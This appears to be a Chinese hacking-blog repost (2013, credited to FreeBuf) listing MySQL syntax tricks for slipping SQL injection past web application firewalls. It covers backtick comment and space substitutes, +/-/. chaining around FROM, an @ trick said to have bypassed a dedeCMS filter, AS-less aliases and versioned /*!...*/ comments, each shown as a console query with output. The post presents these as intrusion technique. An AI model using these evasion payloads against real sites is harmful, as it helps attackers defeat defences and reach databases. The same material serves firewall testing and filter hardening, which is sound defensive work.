记录黑客技术中优秀的内容, 传播黑客文化,分享黑客技术精华

WAF绕过的奇技淫巧

2013-06-01 10:10

研究过国内外的WAF。分享一些 奇淫绝技。

一些大家都了解的技巧如:/*!*/,SELECT[0x09,0x0A-0x0D,0x20,0xA0]xx FROM 不再重造轮子。

Mysql:

tips1: 神奇的 `  (格式输出表的那个控制符)

过空格  过一些正则。

mysql> select`version`()
-> ;
+----------------------+
| `version`() |
+----------------------+
| 5.1.50-community-log |
+----------------------+
1 row in set (0.00 sec)

一个更好玩的技巧,这个` 控制符可以当注释符用(限定条件)。

mysql> select id from qs_admins where id=1;`dfff and comment it;
+----+
| id |
+----+
| 1 |
+----+
1 row in set (0.00 sec)
`>

usage : where  id =’0′`’xxxxcomment on.

tips2:神奇的“- + .”

mysql> select id from qs_admins;
+----+
| id |
+----+
| 1 |
+----+
1 row in set (0.00 sec)

mysql> select+id-1+1.from qs_admins;
+----------+
| +id-1+1. |
+----------+
| 1 |
+----------+
1 row in set (0.00 sec)

mysql> select-id-1+3.from qs_admins;
+----------+
| -id-1+3. |
+----------+
| 1 |
+----------+
1 row in set (0.00 sec)

(有些人不是一直在说关键字怎么过?过滤一个from …    就是这样连起来过)


tips3: @

mysql> select@^1.from qs_admins;
+------+
| @^1. |
+------+
| NULL |
+------+

这个是bypass  曾经dedeCMS filter。


或者下面这样也是可以的:

tips4:mysql function() as xxx  也可以不用as 和空格

mysql> select-count(id)test from qs_admins;
+------+
| test |
+------+
| -1 |
+------+
1 row in set (0.00 sec)


tips5:/*![>5000]*/ 新构造  版本号(这个可能有些过时了。)

mysql> /*!40000select*/ id from qs_admins;
+----+
| id |
+----+
| 1 |
+----+
1 row in set (0.00 sec)

先分享这么多,希望对各位有用。

感谢livers投递

知识来源: www.freebuf.com/articles/web/10099.html

阅读:71890 | 评论:0 | 标签:WEB安全 waf绕过 入侵技巧 安全文章

想收藏或者和大家分享这篇好文章→复制链接地址

“WAF绕过的奇技淫巧”共有0条留言

发表评论

姓名:

邮箱:

网址:

验证码:

公告

九层之台,起于累土;黑客之术,始于阅读

推广

工具

标签云